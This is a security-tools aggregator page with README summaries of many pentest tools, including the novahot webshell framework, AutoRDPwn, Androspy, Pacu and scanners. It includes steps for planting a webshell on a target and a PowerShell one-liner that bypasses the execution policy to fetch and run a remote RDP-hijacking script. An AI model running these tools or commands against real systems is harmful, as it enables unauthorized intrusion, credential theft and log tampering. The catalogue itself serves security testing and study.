KitPloit - PenTest Tools!

Tool designed to help identify incorrectly configured Django applications that are exposing sensitive information.
https://www.reddit.com/r/django/comments/87qcf4/28165_thousand_django_running_servers_are_exposed/https://twitter.com/6ix7ine/status/978598496658960384?lang=en

Usage

Usage: python3 djangohunter.py --key {shodan}
Dorks: 'DisallowedHost', 'KeyError', 'OperationalError', 'Page not found at /'

Requirements

Shodan
Pyfiglet
Requests
BeautifulSoup

pip -r install requirements

Demo

Disclaimer
Code samples are provided for educational purposes. Adequate defenses can only be built by researching attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages from misuse of this information or code.

Download Djangohunter

novahot is a webshell framework for penetration testers. It implements a JSON-based API that can communicate with trojans written in any language. By default, it ships with trojans written in PHP, ruby, and python.

Beyond executing system commands, novahot is able to emulate interactive terminals, including mysql, sqlite3, and psql. It additionally implements "virtual commands" that make it possible to upload, download, edit, and view remote files locallly using your preferred applications.

Installation
Install the executable directly from npm:

[sudo] npm install -g novahot

Then seed a config file:

novahot config > ~/.novahotrc

Usage

View the available trojans with novahot trojan list.
Select a trojan in a language that is appropriate for your target, then copy its source to a new file. (Ex: novahot trojan view basic.php > ~/my-trojan.php)
Change the control password in the newly-created trojan.
Upload the trojan to a web-accessible location on the target.
Configure target information in the targets property in ~/.novahotrc.
Run novahot shell <target> to open a shell.

Shell Modes
Internally, novahot uses "modes" and "adapters" to emulate various interactive clients, currently including the mysql, psql (postgres), and sqlite3 clients.
To change novahot's mode, issue the appropriate "dot command":

.mysql { "username" : "mysql-user", "password" : "the-password", "database" : "the-database" }

(Connection parameters may be specified as JSON while changing modes, or alternatively saved as target configuration data in ~/.novahotrc.)
For example, the mysql mode makes it possible to directly run queries like the following:

mysql> SELECT ID, user_login, user_email, user_pass FROM wp_users;

There additionally exists a payload mode that can be used to POST arbitrary data to the trojan. See the wiki for more information.

Virtual Commands
novahot implements four "virtual commands" that utilize payloads built in to the trojans to extend the functionality of the shell:

download

download <remote-filename> [<local-filename>]

Downloads <remote-filename> to --download-dir, and optionally renames it to <local-filename> if specified.

upload

upload <local-filename> [<remote-filename>]

Uploads <local-filename> to the shell's cwd, and optionally renames <local-filename> to <remote-filename> if specified.

view

view <remote-filename> [<local-filename>]

Downloads <remote-filename> to --download-dir, and optionally renames it to <local-filename> After downloading, the file will be opened by the "viewer" application specified in the configs.

edit

edit <remote-filename>

Downloads <remote-filename> to a temporary file, and then opens that file for editing using the "editor" specified in the configs. Afterward, if changes to the file are saved locally, the file will be re-uploaded to the server automatically.

Provisioning a Test Environment
This repository contains a laboratory environment built on Vagrant, Docker, and the Damn Vulnerable Web Application ("DVWA"). Steps for provisioning the environment vary depending on the capabilities of your physical host.

Using docker-compose
If you have docker and docker-compose installed on your physical host, you may simply do the following:

Clone and cd to this repository
Run: docker-compose up

After the docker container starts, the DVWA will be accessible at http://localhost:80.

Using vagrant
If docker is not installed on your physical host, you may use Vagrant/Virtualbox to access a docker-capable virtual-machine:

Clone and cd to this repository
Provision a virtual machine: vagrant up
SSH into the virtual machine: vagrant ssh
Start the docker container: sudo su; cd /vagrant; docker-compose up

The DVWA will be accessible at http://localhost:8000.

Configuring novahot against the laboratory environment
Specify the following connection strings in your ~/.novahotrc file to connect the novahot client to the PHP trojan embedded in the DVWA container:

{

  "targets": {
    "dvwa" : {
      "uri"      : "http://localhost:8000/novahot.php",
      "password" : "the-password",

      "mysql" : {
        "username": "root",
        "password": "vulnerables",
        "database": "dvwa"
      }
    }
  }

}

You may then establish a webshell via:

novahot shell dvwa

Additional Information
Additional information can be found in the wiki:

Download Novahot

Use open source tools and network intelligence to help organizations with attack surface discovery and identification of security vulnerabilities. Identification of an organizations vulnerabilities is an impossible task without tactical intelligence on the network footprint. By combining open source intelligence with the worlds best open source security scanning tools, we enable your attack surface discovery. With the ability for Internet assets to be deployed in seconds, the attack surface is more dynamic and ever growing. This very fact makes mapping your external network footprint a hard problem. We aim to provide solutions to solve this problem. Start with our tools for domain and IP address data, then pivot to mapping the exposure with hosted open source scanners. We have developed a linux terminal tool using python programming language through an api which we received from HacKerTarget.com.

How do you run it?

git clone https://github.com/ismailtasdelen/hackertarget.git
cd hackertarget/
python hackertarget.py

View :

root@ismailtasdelen:~# python hackertarget.py 

  _               _              _                          _   
 | |_   __ _  __ | |__ ___  _ _ | |_  __ _  _ _  __ _  ___ | |_ 
 | ' \ / _` |/ _|| / // -_)| '_||  _|/ _` || '_|/ _` |/ -_)|  _|
 |_||_|\__,_|\__||_\_\___||_|   \__|\__,_||_|  \__, |\___| \__|
                                                |___/           
           Ismail Tasdelen
 | github.com/ismailtasdelen | linkedin.com/in/ismailtasdelen |


[1] Traceroute
[2] Ping Test
[3] DNS Lookup
[4] Reverse DNS
[5] Find DNS Host
[6] Find Shared DNS
[7] Zone Transfer
[8] Whois Lookup
[9] IP Location Lookup
[10] Reverse IP Lookup
[11] TCP Port Scan
[12] Subnet Lookup
[13] HTTP Header Check
[14] Extract Page Links
[15] Exit

Which option number :

Menu :

[1] Traceroute
[2] Ping Test
[3] DNS Lookup
[4] Reverse DNS
[5] Find DNS Host
[6] Find Shared DNS
[7] Zone Transfer
[8] Whois Lookup
[9] IP Location Lookup
[10] Reverse IP Lookup
[11] TCP Port Scan
[12] Subnet Lookup
[13] HTTP Header Check
[14] Extract Page Links
[15] Exit

Cloning an Existing Repository ( Clone with HTTPS )

root@ismailtasdelen:~# git clone https://github.com/ismailtasdelen/hackertarget.git

Cloning an Existing Repository ( Clone with SSH )

root@ismailtasdelen:~# git clone git@github.com:ismailtasdelen/hackertarget.git

Reference :

https://hackertarget.com/

Download Hackertarget

DEVELOPMENT BRANCH: The current branch is a development version. Go to the stable release by clicking on the master branch.

Dirhunt is a web crawler optimize for search and analyze directories. This tool can find interesting things if the server has the "index of" mode enabled. Dirhunt is also useful if the directory listing is not enabled. It detects directories with false 404 errors, directories where an empty index file has been created to hide things and much more.

$ dirhunt http://website.com/

Dirhunt does not use brute force. But neither is it just a crawler. This tool is faster than others because it minimizes requests to the server. Generally, this tool takes between 5-30 seconds, depending on the website and the server.
Read more about how to use Dirhunt in the documentation.

Features

Process one or multiple sites at a time.
Process 'Index Of' pages and report interesting files.
Detect redirectors.
Detect blank index file created on directory to hide things.
Process some html files in search of new directories.
404 error pages and detect fake 404 errors.
Filter results by flags.
Analyze results at end. It also processes date & size of the Index Pages (NEW!)
Get new directories using robots.txt, VirusTotal& Google (NEW!)
Delay between requests
One or multiple proxies option. It can also search for free proxies (NEW!)

Install
If you have Pip installed on your system, you can use it to install the latest Dirhunt stable version:

$ sudo pip3 install dirhunt

Python 2.7 & 3.4-3.7 are supported but Python 3.x is recommended. Use pip2 on install for Python2.
There are other installation methods available.

Download Dirhunt v0.6.0

A Web Dashbord for Nmap XML Report

Usage
You should use this with docker, just by sending this command:

$ mkdir /tmp/webmap
$ docker run -d \
         --name webmap \
         -h webmap \
         -p 8000:8000 \
         -v /tmp/webmap:/opt/xml \
         rev3rse/webmap

$ # now you can run Nmap and save the XML Report on /tmp/webmap
$ nmap -sT -A -T4 -oX /tmp/webmap/myscan.xml 192.168.1.0/24

Now point your browser to http://localhost:8000

Quick and Dirty

$ curl -sL http://bit.ly/webmapsetup | bash

Upgrade from previous release

$ # stop running webmap container
$ docker stop webmap

$ # remove webmap container
$ docker rm webmap

$ # pull new image from dockerhub
$ docker pull rev3rse/webmap

$ # run WebMap
$ curl -sL http://bit.ly/webmapsetup | bash

Run without Docker
This project is designed to run on a Docker container. IMHO it isn't a good idea to run this on a custom Django installation, but if you need it you can find all building steps inside the Dockerfile.

Features

Import and parse Nmap XML files
Statistics and Charts on discovered services, ports, OS, etc...
Inspect a single host by clicking on its IP address
Attach labels on a host
Insert notes for a specific host
Create a PDF Report with charts, details, labels and notes
Copy to clipboard as Nikto, Curl or Telnet commands
Search for CVE and Exploits based on CPE collected by Nmap

Changes on v2.1

Better usage of Django template
Fixed some Nmap XML parse problems
Fixed CVE and Exploit collecting problems
Add new Network View

PDF Report

XML Filenames
When creating the PDF version of the Nmap XML Report, the XML filename is used as document title on the first page. WebMap will replace some parts of the filename as following:

_ will replaced by a space ()
.xml will be removed

Example: ACME_Ltd..xml
PDF title: ACME Ltd.

CVE and Exploits
thanks to the amazing API services by circl.lu, WebMap is able to looking for CVE and Exploits for each CPE collected by Nmap. Not all CPE are checked over the circl.lu API, but only when a specific version is specified (for example: cpe:/a:microsoft:iis:7.5 and not cpe:/o:microsoft:windows).

Network View

Third Parts

Security Issues
This app is not intended to be exposed on the internet. Please, DO NOT expose this app to the internet, use your localhost or, in case you can't do it, take care to filter who and what can access to WebMap with a firewall rule or something like that. Exposing this app to the whole internet could lead not only to a stored XSS but also to a leakage of sensitive/critical/private informations about your port scan. Please, be smart.

Contributors
This project is currently a beta, and I'm not super skilled on Django so, every type of contribution is appreciated. I'll mention all contributors in this section of the README file.

Contributors List

s3th_0x @adubaldo (bug on single host report)
Neetx @Neetx (bug on xml with no host up)

Contacts
In order to receive updates about this project, please follow me on twitter:
Twitter: @Menin_TheMiddle
YouTube: Rev3rseSecurity

Download WebMap

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim's desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.

Requirements
Powershell 5.0 or higher

Changes

Version 4.5
• New ninja style icon!
• Automatic cleaning of Powershell history after execution
• Now all dependencies are downloaded from the same repository
• Many errors and bugs fixed
• UAC & AMSI bypass in 64-bit systems
• New module available: Remote Desktop Caching
• New module available: Disable system logs (Invoke-Phant0m)
• New module available: Sticky Keys Hacking
• New available module: Remote Desktop History
• New available attack: Session Hijacking (passwordless)
WARNING! This attack is very intrusive and can only be used locally
*The rest of the changes can be consulted in the CHANGELOG file

Use
This application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords or even recover the history of RDP connections.
One line execution:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Screenshots

Credits and Acknowledgments
• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• HarmJ0y & Matt Graeber for his script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell
• Stas'M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap
• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz
• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0m

Contact
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can contact through info@darkbyte.net

Download AutoRDPwn

Features

Multi-threading
3 modes of detection
Regex powered heuristic scanning
Huge list of 3370 parameter names

Usage

Note:Arjun doesn't work with python < 3.4

Discover parameters
To find GET parameters, you can simply do:

python3 arjun.py -u https://api.example.com/endpoint --get

Similarly, use --post to find POST parameters.

Multi-threading
Arjun uses 2 threads by default but you can tune its performance according to your network connection.

python3 arjun.py -u https://api.example.com/endpoint --get -t 22

Delay between requests
You can delay the request by using the -d option as follows:

python3 arjun.py  -u https://api.example.com/endpoint --get -d 2

Adding HTTP Headers
Using the --headers switch will open an interactive prompt where you can paste your headers. Press Ctrl + S to save and Ctrl + X to procced.

Note: Arjun uses nano as the default editor for the prompt but you can change it by tweaking /core/prompt.py.

Credits
The parameter names list has been taken from @SecLists

Download Arjun

Androspy : is Backdoor Crypter & Creator with Automatic IP Poisener Coded By Belahsan Ouerghi

Dependencies

keytool
jarsigner
Apache2
Metasploit-Framework
xterm

Installation

sudo apt-get install git
git clone https://github.com/TunisianEagles/Androspy.git
cd Androspy
chmod +x setup.sh
sudo ./setup.sh
chmod +x androspy.sh
sudo ./androspy.sh

Tested on :

BackBox Linux
Kali linux
Parrot os

Contact

Contact - Tunisian Eagles
[Email] - tunisianeagles@protonmail.com - TunisianEagles
Website - TunisianEagles

Download Androspy

Manticore is a symbolic execution tool for analysis of binaries and smart contracts.

Note: Beginning with version 0.2.0, Python 3.6+ is required.

Features

Input Generation: Manticore automatically generates inputs that trigger unique code paths
Crash Discovery: Manticore discovers inputs that crash programs via memory safety violations
Execution Tracing: Manticore records an instruction-level trace of execution for each generated input
Programmatic Interface: Manticore exposes programmatic access to its analysis engine via a Python API

Manticore can analyze the following types of programs:

Ethereum smart contracts (EVM bytecode)
Linux ELF binaries (x86, x86_64 and ARMv7)

Usage

CLI
Manticore has a command line interface which can be used to easily symbolically execute a supported program or smart contract. Analysis results will be placed into a new directory beginning with mcore_.
Use the CLI to explore possible states in Ethereum smart contracts. Manticore includes detectors that flag potentially vulnerable code in discovered states. Solidity smart contracts must have a .sol extension for analysis by Manticore. See a demo.

$ manticore ./path/to/contract.sol  # runs, and creates a mcore_* directory with analysis results
$ manticore --detect-reentrancy ./path/to/contract.sol  # Above, but with reentrancy detection enabled
$ manticore --detect-all ./path/to/contract.sol  # Above, but with all detectors enabled

The command line can also be used to simply explore a Linux binary:

$ manticore ./path/to/binary        # runs, and creates a mcore_* directory with analysis results
$ manticore ./path/to/binary ab cd  # use concrete strings "ab", "cd" as program arguments
$ manticore ./path/to/binary ++ ++  # use two symbolic strings of length two as program arguments

API
Manticore has a Python programming interface which can be used to implement custom analyses.
For Ethereum smart contracts, it can be used for detailed verification of arbitrary contract properties. Set starting conditions, execute symbolic transactions, then review discovered states to ensure invariants for your contract hold.

from manticore.ethereum import ManticoreEVM
contract_src="""
contract Adder {
    function incremented(uint value) public returns (uint){
        if (value == 1)
            revert();
        return value + 1;
    }
}
"""
m = ManticoreEVM()

user_account = m.create_account(balance=1000)
contract_account = m.solidity_create_contract(contract_src,
                                              owner=user_account,
                                              balance=0)
value = m.make_symbolic_value()

contract_account.incremented(value)

for state in m.running_states:
    print("can value be 1? {}".format(state.can_be_true(value == 1)))
    print("can value be 200? {}".format(state.can_be_true(value == 200)))

It is also possible to use the API to create custom analysis tools for Linux binaries.

# example Manticore script
from manticore import Manticore

hook_pc = 0x400ca0

m = Manticore('./path/to/binary')

@m.hook(hook_pc)
def hook(state):
  cpu = state.cpu
  print('eax', cpu.EAX)
  print(cpu.read_int(cpu.ESP))

  m.terminate()  # tell Manticore to stop

m.run()

Requirements

Manticore is supported on Linux and requires Python 3.6+.
Ubuntu 18.04 is strongly recommended.
Ethereum smart contract analysis requires the solc program in your $PATH.

Quickstart
Install and try Manticore in a few shell commands:

# Install system dependencies
sudo apt-get update && sudo apt-get install python3 python3-pip -y

# Install Manticore and its dependencies
sudo pip3 install manticore

# Download the examples
git clone https://github.com/trailofbits/manticore.git && cd manticore/examples/linux

# Build the examples
make

# Use the Manticore CLI
manticore basic
cat mcore_*/*0.stdin | ./basic
cat mcore_*/*1.stdin | ./basic

# Use the Manticore API
cd ../script
python3 count_instructions.py ../linux/helloworld

You can also use Docker to quickly install and try Manticore:

# Download the Manticore image
docker pull trailofbits/manticore

# Download the examples
git clone https://github.com/trailofbits/manticore.git && cd manticore

# Run container with a shared examples/ directory
docker run -it -v $PWD/examples:/home/manticore/examples trailofbits/manticore

# Change to examples directory
manticore@80d441275ebf$ cd examples/linux

# Build the examples
manticore@80d441275ebf$ make

# Use the Manticore CLI
manticore@80d441275ebf$ manticore basic
manticore@80d441275ebf$ cat mcore_*/*0.stdin | ./basic
manticore@80d441275ebf$ cat mcore_*/*1.stdin | ./basic

# Use the Manticore API
manticore@80d441275ebf$ cd ../script
manticore@80d441275ebf$ python3 count_instructions.py ../linux/helloworld

Installation
Option 1: Perform a user install (requires ~/.local/bin in your PATH).

echo "PATH=\$PATH:~/.local/bin" >> ~/.profile
source ~/.profile
pip3 install --user manticore

Option 2: Use a virtual environment (requires virtualenvwrapper or similar).

sudo pip3 install virtualenvwrapper
echo "source /usr/local/bin/virtualenvwrapper.sh" >> ~/.profile
source ~/.profile
mkvirtualenv manticore
sudo ./manticore/bin/pip3 install manticore

Option 3: Perform a system install.

sudo pip3 install manticore

Option 4: Install via Docker.

docker pull trailofbits/manticore

Once installed, the manticore CLI tool and Python API will be available.
For installing a development version of Manticore, see our wiki.

Getting Help
Feel free to stop by our Slack channel for help on using or extending Manticore.
Documentation is available in several places:

The wiki contains some basic information about getting started with Manticore and contributing
The examples directory has some very minimal examples that showcase API features
The API reference has more thorough and in-depth documentation on our API
The manticore-examples repository has some more involved examples, for instance solving real CTF problems

Download Manticore

Tested on Kali Linux. Should work with all Debian based distros (and other ones if you have the right packages installed)

BabySploit is a penetration testing framework aimed at making it easy to learn how to use bigger, more complicated frameworks like Metasploit. With a very easy to use UI and toolkit, anybody from any experience level will find use out of BabySploit.

Features (Current, In The Works, Planned):

Information Gathering
Exploitation
Post Exploitation
Bruteforcing
Phishing
Cryptography/Stenography

Information Gathering:

Nmap
IP Info
Tcpdump (In The Works)
Datasploit (In The Works)
Censys Lookup
DNS Lookup

Exploitation:

Searchsploit
ReverseShell Wizard

Post Exploitation:

In The Works

Bruteforcing:

In The Works

Phishing:

BlackEye Python

Crypto/Steno:

MetaKiller (In The Works)

Download BabySploit

Automatic Reconnaisance and Scanning in Penetration Testing

What is Osmedeus?

Osmedeus allow you to doing boring stuff in Pentesting automatically like reconnaissance and scanning the target by run the collection of awesome tools.

Installation

git clone https://github.com/j3ssie/Osmedeus
cd Osmedeus
chmod +x install.sh
./install.sh

How to use

Doing normal routine include: Subdomain Scanning, Subdomain TakeOver Scanning, Port Scanning and ScreenShot the target.

./osmedeus.py -t example.com

Scanning subdomain and Subdomain TakeOver

./osmedeus.py -m subdomain -t example.com

Git repo scanning

./osmedeus.py -m git --git https://github.com/whatever/repo

Doing some stuff with Burp State file

./osmedeus.py -m burp -t example.com --burp yourburpstate.xml

Available modules with list tool being used

Subdomain Scanning
Subdomain TakeOver Scanning
- subjack
- SubOver
Port Scanning and ScreenShot the target
Git repo scanning
- truffleHog
- gitrob
Doing some stuff with Burp State file

Demo

Contact
@j3ssiejjj

Download Osmedeus

DeepSearch is a simple command line tool for bruteforce directories and files in websites.

Installation

$ git clone https://github.com/m4ll0k/DeepSearch.git deepsearch
$ cd deepsearch 
$ pip3 install requests
$ python3 deepsearch.py

Screenshots

Usage
Basic:

python3 deepsearch.py -u http://testphp.vulnweb.com/ -e php -w wordlist.txt

Force extension for every wordlist entry (support one extension):

python3 deepsearch.py -u http://testphp.vulnweb.com/ -e php -w wordlist.txt -f

Make a request by hostname (ip):

python3 deepsearch.py -u http://testphp.vulnweb.com/ -e php -w wordlist.txt -b

Force lowercase for every wordlist entry:

python3 deepsearch.py -u http://testphp.vulnweb.com/ -e php -w wordlist.txt -l

Force uppercase for every wordlist entry:

python3 deepsearch.py -u http://testphp.vulnweb.com/ -e php -w wordlist.txt -p

Show only status code separated by comma:

python3 deepsearch.py -u http://testphp.vulnweb.com/ -e php -w wordlist.txt -o 200,301,302

Exclude status code separated by comma:

python3 deepsearch.py -u http://testphp.vulnweb.com/ -e php -w wordlist.txt -x 501,502,503,401

URL Injection Point (%word%):

python3 deepsearch.py -u http://testphp.vulnweb.com/test%1%.php -e php -w wordlist.txt

URL Injection Point (%%):

python3 deepsearch.py -u http://testphp.vulnweb.com/id/%1%/index.html -e php -w wordlist.txt

URL Parameters Injection:

python3 deepsearch.py -u http://testphp.vulnweb.com/index.php?id=%2%&user=1 -e php -w wordlist.txt

python3 deepsearch.py -u http://testphp.vulnweb.com/index.php?%id%=1&user=2 -e php -w wordlist.txt

Add Headers:

python3 deepsearch.py -u http://testphp.vulnweb.com/ -e php -w wordlist.txt -H "Content-Type:text/html\nETag:1234"

Proxy:

python3 deepsearch.py -u http://testphp.vulnweb.com/ -e php -w wordlist.txt -P 127.0.0.1:8080

URLs by list:

python3 deepsearch.py -U my_urls.txt -e php -w wordlist.txt

Other Options:

python3 deepsearch.py -u http://testphp.vulnweb.com/ -e php -w wordlist.txt -t 10 -T 3 -d 2 -R -c "test=test" --random-agent

Download DeepSearch

CloudBunny is a tool to capture the real IP of the server that uses a WAF as a proxy or protection.

How works
In this tool we used three search engines to search domain information: Shodan, Censys and Zoomeye. To use the tools you need the API Keys, you can pick up the following links:

Shodan - https://account.shodan.io/
Censys - https://censys.io/account/api
ZoomEye - https://www.zoomeye.org/profile

NOTE: In Zoomeye you need to enter the login and password, it generates a dynamic api key and I already do this work for you. Just enter your login and password.
After that you need to put the credentials in the api.conf file.
Install the requirements:

$ sudo pip install -r requirements.txt

Usage
By default the tool searches on all search engines (you can set this up by arguments), but you need to put the credentials as stated above. After you have loaded the credentials and installed the requirements, execute:

$ python cloudbunny.py -u securityattack.com.br

Check our help area:

$ python cloudbunny.py -h

Change securityattack.com.br for the domain of your choice.

Example


$ python cloudbunny.py -u site_example.com.br

             /|      __  
            / |   ,-~ /  
           Y :|  //  /    
           | jj /( .^  
>-"~"-v"  
          /       Y    
         jo  o    |  
        ( ~T~     j   
>._-' _./   
        /   "~"  |    
       Y     _,  |      
      /| ;-"~ _  l    
     / l/ ,-"~    \  
     \//\/      .- \  
      Y        /    Y*  
      l       I     ! 
      ]\      _\    /"\ 
     (" ~----( ~   Y.  )   
 ~~~~~~~~~~~~~~~~~~~~~~~~~~    
CloudBunny - Bypass WAF with Search Engines 
Author: Eddy Oliveira (@Warflop)
https://github.com/Warflop 

[+] Looking for target on Shodan...
[+] Looking for target on Censys...
[+] Looking for certificates on Censys...
[+] Looking for target on ZoomEye...
[-] Just more some seconds...


+---------------+------------+-----------+----------------------------+
|   IP Address  |    ISP     |   Ports   |        Last Update         |
+---------------+------------+-----------+----------------------------+
|  55.14.232.4  | Amazon.com | [80, 443] | 2018-11-02T16:02:51.074543 |
| 54.222.146.40 | Amazon.com |    [80]   | 2018-11-02T10:16:38.166829 |
| 18.235.52.237 | Amazon.com | [443, 80] | 2018-11-08T01:22:11.323980 |
| 54.237.93.127 | Amazon.com | [443, 80] | 2018-11-05T15:54:40.248599 |
| 53.222.94.157 | Amazon.com | [443, 80] | 2018-11-06T08:46:03.377082 |
+---------------+------------+-----------+----------------------------+
    We may have some false positives :)

Download CloudBunny

Scrape/Parse Pastebin using GO and grammar expression (PEG).

Installation

$ go get -u github.com/edoz90/pastego

Usage
Search keywords are case sensitive

pastego -s "password,keygen,PASSWORD"

You can use boolean operators to reduce false positive

pastego -s "quake && ~earthquake, password && ~(php || sudo || Linux || '<body>')"

This command will search for bins with quake but not earthquake words and for bins with password but not php, sudo, Linux, <body> words.

usage: pastego [<flags>]

Flags:
      --help              Show context-sensitive help (also try --help-long and --help-man).
  -s, --search="pass"     Strings to search, i.e: "password,ssh"
  -o, --output="results"  Folder to save the bins
  -i, --insensitive       Search for case-insensitive strings

Supported expression/operators:

`&&` - and

`||` - or

`~` - not

`'string with space'`

`(myexpression && 'with operators')`

Keybindings
q, ctrl+c: quit pastego
k, ↑: show previous bin
j, ↓: show next bin
n: jump forward by 15 bins
p: jump backward by 15 bins
N: move to the next block of findings (in alphabet order)
P: move to the previous block of findings (in alphabet order)
d: delete file from file system
HOME: go to top

Requirements

goquery

go get -u "github.com/PuerkitoBio/goquery"

kingpin

go get -u "gopkg.in/alecthomas/kingpin.v2"

gocui

go get -u "github.com/jroimartin/gocui"

To create the code from PEG use pigeon:

go get -u github.com/mna/pigeon

Disclaimer
You need a PRO account to use this: pastebin will block/blacklist your IP.
pastebin PRO

Or....

increase the time between each request
create a script to restart your router when pastebin warns you

In progress...
Add flag to pass/read a list of proxies to avoid IP ban/throttle for free users

Download Pastego

Pacu is an open source AWS exploitation framework, designed for offensive security testing against cloud environments. Created and maintained by Rhino Security Labs, Pacu allows penetration testers to exploit configuration flaws within an AWS account, using modules to easily expand its functionality. Current modules enable a range of attacks, including user privilege escalation, backdooring of IAM users, attacking vulnerable Lambda functions, and much more.

Installation
Pacu is a fairly lightweight program, as it requires only Python3.5+ and pip3 to install a handful of Python libraries. Running install.sh will check your Python version and ensure all Python packages are up to date.

Quick Installation

> git clone https://github.com/RhinoSecurityLabs/pacu
> cd pacu
> bash install.sh
> python3 pacu.py

For a more detailed and user-friendly set of user instructions, please check out the Wiki's installation guide.

Pacu's Modular Power
Pacu uses a range of plug-in modules to assist an attacker in enumeration, privilege escalation, data exfiltration, service exploitation, and log manipulation within AWS environments. At present, Pacu has 36 modules for executing AWS attacks, but we'll be working hard to add more modules in the future, and suggestions for new modules (or even contributions of whole completed modules) are welcome.
In order to keep pace with ongoing AWS product developments, we've designed Pacu from the ground up with extensibility in mind. A common syntax and data structure keeps modules easy to build and expand on - no need to specify AWS regions or make redundant permission checks between modules. A local SQLite database is used to manage and manipulate retrieved data, minimizing API calls (and associated logs). Reporting and attack auditing is also built into the framework; Pacu assists the documentation process through command logging and exporting, helping build a timeline for the testing process.
We'll be working on improve Pacu's core capabilities and building out a well-documented ecosystem so that cybersecurity researchers and developers can make new modules quickly and easily.

Community
We're always happy to get bugs reports in the Pacu framework itself, as well as testing and feedback on different modules, and generally critical feedback to help refine the framework. We hope to see this grow into a key open-source tool for testing AWS security, and we need your help to make that happen! Any support towards this effort through use, testing, improvement, or just by spreading the word, would be very much appreciated.
If you're interested in contributing directly to the Pacu Framework itself, please read our contribution guidelines for code conventions and git flow notes.

Developing Pacu Modules
If you're interested in writing your own modules for Pacu, check out our Module Development wiki page. As you develop new capabilities please reach out to us -- we'd love to add your new modules into the core collection that comes with Pacu.

Pacu Framework Development Goals

Improve interface formatting
Database forward-migrations and version tracking
"Attack Playbooks" to allow for easier use of complex module execution chains
Colored console output
Module Dry-Run functionality
Allow use of standalone config files
Plugin architecture improvements

Notes

Pacu is officially supported in OSX and Linux.
Pacu is Open-Source Software, and is distributed with a BSD-3-Clause License.

Getting Started
The first time Pacu is launched, you will be prompted to start and name a new session. This session will be used to store AWS key pairs, as well as any data obtained from running various modules. You can have any number of different sessions in Pacu, each with their own sets of AWS keys and data, and resume a session at any time (though a restart is currently required to switch between sessions).
Modules require an AWS key, which grant you minimal access to an AWS environment and are comprised of an access key ID and a secret access key. To set your session's keys, use the set_keys command, and then follow the prompts to supply a key alias (nickname for reference), an AWS access key ID, an AWS secret access key, and an AWS session token (if you are using one).
If you are ever stuck, help will bring up a list of commands that are available.

Basic Commands in Pacu

list will list the available modules for the regions that were set in the current session.
help module_name will return the applicable help information for the specified module.
run module_name will run the specified module with its default parameters.
run module_name --regions eu-west-1,us-west-1 will run the specified module against the eu-west-1 and us-west-1 regions (for modules that support the --regions argument)

Submitting Requests / Bug Reports

Report vulnerabilities in Pacu directly to us via email: pacu@rhinosecuritylabs.com .
Pacu creates error logs within each session's folder, as well as a global error log for out-of-session errors which is created in the main directory. If you can, please include these logs with your bug reports, as it will dramatically simplify the debugging process.
If you have a feature request, an idea, or a bug to report, please submit them here.
- Please include a description sufficient to reproduce the bug you found, including tracebacks and reproduction steps, and check for other reports of your bug before filing a new bug report. Don't submit duplicates.

Wiki
For walkthroughs and full documentation, please visit the Pacu wiki.

Contact Us

We'd love to hear from you, whatever the reason. Shoot us an email at pacu@rhinosecuritylabs.com anytime!

Disclaimers, and the AWS Acceptable Use Policy

To the best of our knowledge Pacu's capabilities are compliant with the AWS Acceptable Use Policy, but as a flexible and modular tool we cannot guarantee this will be true in every situation. It is entirely your responsibility to ensure that how you use Pacu is compliant with the AWS Acceptable Use Policy.
Depending on what AWS services you use and what your planned testing entails, you may need to request authorization from Amazon prior to actually running Pacu against your infrastructure. Determining whether or not such authorization is necessary is your responsibility.
As with any penetration testing tool, it is your responsibility to get proper authorization before using Pacu outside of your own environment.
Pacu is software that comes with absolutely no warranties whatsoever. By using Pacu, you take full responsibility for any and all outcomes that result.

Download Pacu

"HASSH" is a network fingerprinting standard which can be used to identify specific Client and Server SSH implementations. The fingerprints can be easily stored, searched and shared in the form of an MD5 fingerprint.

What can HASSH help with:

Use in highly controlled, well understood environments, where any fingerprints outside of a known good set are alertable.
It is possible to detect, control and investigate brute force or Cred Stuffing password attempts at a higher level of granularity than IP Source - which may be impacted by NAT or botnet-like behaviour. The hassh will be a feature of the specific Client software implementation being used, even if the IP is NATed such that it is shared by many other SSH clients.
Detect covert exfiltration of data within the components of the Client algorithm sets. In this case, a specially coded SSH Client can send data outbound from a trusted to a less trusted environment within a series of SSH_MSG_KEXINIT packets. In a scenario similar to the more known exfiltration via DNS, data could be sent as a series of attempted, but incomplete and unlogged connections to an SSH server controlled by bad actors who can then record, decode and reconstitute these pieces of data into their original form. Until now such attempts - much less the contents of the clear text packets - are not logged even by mature packet analyzers or on end point systems. Detection of this style of exfiltration can now be performed easily by using anomaly detection or alerting on SSH Clients with multiple different hassh
Use in conjunction with other contextual indicators, for example detect Network discovery and Lateral movement attempts by unusual hassh such as those used by Paramiko, Powershell, Ruby, Meterpreter, Empire.
Share malicious hassh as Indicators of Compromise.
Create an additional level of Client application control, for example one could block all Clients from connecting to an SSH server that are outside of an approved known set of hassh values.
Contribute to Non Repudiation in a Forensic context - at a higher level of abstraction than IPSource - which may be impacted by NAT, or where multiple IP Sources are used.
Detect Deceptive Applications. Eg a hasshServer value known to belong to the Cowry/Kippo SSH honeypot server installation, which is purporting to be a common OpenSSH server in the Server String.
Detect devices having a hassh known to belong to IOT embedded systems. Examples may include cameras, mics, keyloggers, wiretaps that could be easily be hidden from view and communicating quietly over encrypted channels back to a control server.

How does HASSH work:

